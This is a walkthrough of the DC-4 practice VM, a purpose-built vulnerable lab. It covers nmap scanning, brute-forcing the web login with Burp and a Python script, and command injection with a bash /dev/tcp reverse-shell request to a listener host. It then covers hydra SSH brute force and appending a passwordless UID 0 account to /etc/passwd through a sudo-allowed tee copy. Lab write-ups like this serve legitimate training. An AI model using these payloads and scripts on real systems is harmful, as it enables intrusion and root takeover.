Target machine information

DESCRIPTION
DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

TECHNICAL INFORMATION
DC-4 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.

If there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

Information gathering

After deploying the target VM, sweep the subnet with nmap to find the live IP addresses: one is Kali's, the other is the target's. Then scan the target's open ports.

# ping sweep of the subnet to find live hosts (-sP is the old spelling of -sn; both still work)
nmap -sP 10.0.0.0/24
# full TCP port scan of the target with service/version detection
nmap -sV -p- 10.0.0.20

QQ截图20210223083636.png

Based on the scan results, browse to port 80.

QQ截图20210223083838.png

Use whatweb to fingerprint the web server.

whatweb 10.0.0.20

QQ截图20210223084835.png

flag1

There is only one form (the login page) plus SSH, so start by brute-forcing the form with Burp Suite: capture the login request and send it to the Intruder module.

QQ截图20210223090808.png

Load the wordlist as the payload.

QQ截图20210223091327.png

Start the attack.

QQ截图20210223091603.png

Result: one response differs in length/status from the rest, which is the valid login.

QQ截图20210223130123.png
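As an added example (not part of the original walkthrough), the same wordlist attack scripted in Python instead of Burp Intruder. It runs against a constructed local stand-in for the login page so it can be executed offline; the form path `/login.php`, the field names `username`/`password`, and the success signal (a valid login answers with a 3xx redirect, an invalid one re-renders the form with 200) are assumptions to confirm in Burp before trusting the result against the real target.

```python
"""Wordlist attack on a POST login form (added example, not code from the walkthrough).

Assumptions, not taken from the page: the form lives at /login.php, the fields are
named `username` and `password`, and a valid login answers with a 3xx redirect while
a bad one re-renders the form with 200. Check these in Burp before trusting the result.
"""
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample lists; a real run would read user.dic / pass.dic from disk.
USERNAMES = ["admin"]
PASSWORDS = ["123456", "password", "s3cret-demo", "letmein"]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so the 3xx itself is visible as the success signal."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect())


def attempt(url, username, password, timeout=5):
    """One login attempt. Returns True when the server answers with a redirect."""
    body = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=body, method="POST")
    try:
        with _OPENER.open(req, timeout=timeout) as resp:
            return 300 <= resp.status < 400
    except urllib.error.HTTPError as err:
        # With redirects disabled urllib raises HTTPError for 3xx; 4xx/5xx land here too.
        return 300 <= err.code < 400


def brute_force(url, usernames, passwords):
    """Try every username/password pair in order; return the first that works, else None."""
    for user in usernames:
        for pw in passwords:
            if attempt(url, user, pw):
                return user, pw
    return None


class _FakeLogin(BaseHTTPRequestHandler):
    """Constructed stand-in for the target's login page, used only so the demo runs offline."""

    VALID = ("admin", "s3cret-demo")  # constructed credential, not the real target's

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        creds = (form.get("username", [""])[0], form.get("password", [""])[0])
        if creds == self.VALID:
            self.send_response(302)
            self.send_header("Location", "/index.php")
            self.end_headers()
        else:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html><body>bad login</body></html>")

    def log_message(self, *args):  # keep the demo quiet
        pass


def run_demo():
    """Start the fake login server on a free loopback port, attack it, and return the hit."""
    server = HTTPServer(("127.0.0.1", 0), _FakeLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    url = "http://127.0.0.1:%d/login.php" % server.server_port
    try:
        return brute_force(url, USERNAMES, PASSWORDS)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("valid credentials:", run_demo())
```

The script is single-threaded on purpose: against a real host, throttle and watch for lockouts or changed responses before scaling up, and confirm the success signal by hand, since a 302 can also mean "redirected back to the login page".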

After logging in, the command page sends the command to execute as the `radio` POST parameter to /command.php; changing that value gives direct command injection.

QQ截图20210223133021.png

Get a reverse shell. With a listener waiting on 10.0.0.221:1234, send the request below. The payload is wrapped in `echo ... | bash` because the `/dev/tcp` redirection only exists in bash, while PHP's command-execution functions run through /bin/sh (dash on Debian). The `&` characters are encoded as %26 so the web server does not treat them as form-field separators, and Content-Length must match the encoded body (74 bytes here, not 57 as in the original capture).

POST /command.php HTTP/1.1
Host: 10.0.0.20
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.20/command.php
Cookie: PHPSESSID=utki8evce1u13sugjcfbr5esv0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

radio=echo+"bash+-i+>%26+/dev/tcp/10.0.0.221/1234+0>%261"+|+bash&submit=Run

QQ截图20210223133745.png

Looking around /home/jim, there is a backups directory containing a password wordlist, and a test.sh script.

QQ截图20210223134046.png

Use that wordlist to brute-force SSH with hydra (user.dic holds the candidate usernames, pass.dic is the wordlist copied from /home/jim/backups).

hydra -L ./user.dic -P pass.dic 10.0.0.20 ssh

QQ截图20210223141716.png

Log in over SSH with the password hydra found and read the mbox file in jim's home directory.

# password for jim found by hydra: jibril04
ssh jim@10.0.0.20

QQ截图20210223142012.png

That mbox points to system mail. In the system mail spool (/var/mail) there is a message containing the password of another account, so we log in as that user.

QQ截图20210223142305.png

The help output of the command this user may run with sudo, teehee, shows it is tee under another name and can append to files. That allows appending a new UID 0 user to /etc/passwd, or adding a cron job that changes the permissions on the bash binary, to obtain root.

QQ截图20210223142932.png

# teehee behaves like tee: -a appends stdin to the file; type the line, then press Ctrl-D
sudo teehee -a /etc/passwd
# seven fields: name, empty password (no password needed), uid 0, gid 0, gecos, home, shell
roots::0:0:::/bin/bash
# switch to the new UID 0 account
su roots

QQ截图20210223143247.png

QQ截图20210223143254.png

QQ截图20210223143417.png
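As an added example (not code from the walkthrough), the /etc/passwd entry appended above rebuilt in Python together with the checks worth doing before writing it: exactly seven fields, no `:` or newline inside a field, UID 0, and a leading newline when the existing file does not end with one. That last point matters because `tee -a` appends raw bytes, so without it the new entry is glued onto the last user's shell field and silently creates no account. The sample passwd content is constructed; the `openssl passwd -6` suggestion for a hashed password is an alternative the page does not use.

```python
"""Build and sanity-check the /etc/passwd entry appended through `sudo teehee -a` (added example)."""

# Constructed sample of an /etc/passwd tail; the missing trailing newline is deliberate.
SAMPLE_PASSWD = (
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"jim:x:1001:1001:jim,,,:/home/jim:/bin/bash\n"
    b"charles:x:1002:1002:charles,,,:/home/charles:/bin/bash"
)


def passwd_entry(name, password_field="", uid=0, gid=0, gecos="", home="", shell="/bin/bash"):
    """Assemble a passwd line. An empty password field means 'no password' (what the page
    relies on); put a crypt(3) hash there instead, e.g. from `openssl passwd -6`, to avoid
    leaving a passwordless root-equivalent account behind."""
    fields = [name, password_field, str(uid), str(gid), gecos, home, shell]
    for f in fields:
        if ":" in f or "\n" in f:
            raise ValueError("passwd fields may not contain ':' or newline: %r" % f)
    return ":".join(fields)


def bytes_to_append(current_content, entry):
    """What to feed into `teehee -a /etc/passwd` so the entry lands on its own line."""
    needs_newline = bool(current_content) and not current_content.endswith(b"\n")
    return (b"\n" if needs_newline else b"") + entry.encode() + b"\n"


def parse_passwd(content):
    """Minimal reader: (name, uid, shell) for every well-formed 7-field line.
    Malformed lines are skipped; a glued-together line does not create the account."""
    users = []
    for line in content.decode().splitlines():
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit():
            continue
        users.append((parts[0], int(parts[2]), parts[6]))
    return users


def uid0_accounts(content):
    """Names of every account that resolves to UID 0 (what `su <name>` would give root)."""
    return [name for name, uid, _ in parse_passwd(content) if uid == 0]


def demo():
    """Reproduce the walkthrough's entry and show it is picked up as a second UID 0 user."""
    entry = passwd_entry("roots")  # same line as on the page
    after = SAMPLE_PASSWD + bytes_to_append(SAMPLE_PASSWD, entry)
    return entry, uid0_accounts(after)


if __name__ == "__main__":
    print(demo())
```

The empty home field works but `su` warns about it; giving the account a home of `/root` is harmless. More importantly, a passwordless UID 0 account is exactly the kind of persistence a defender looks for (`awk -F: '$3 == 0' /etc/passwd`), so remove it once the flag is read.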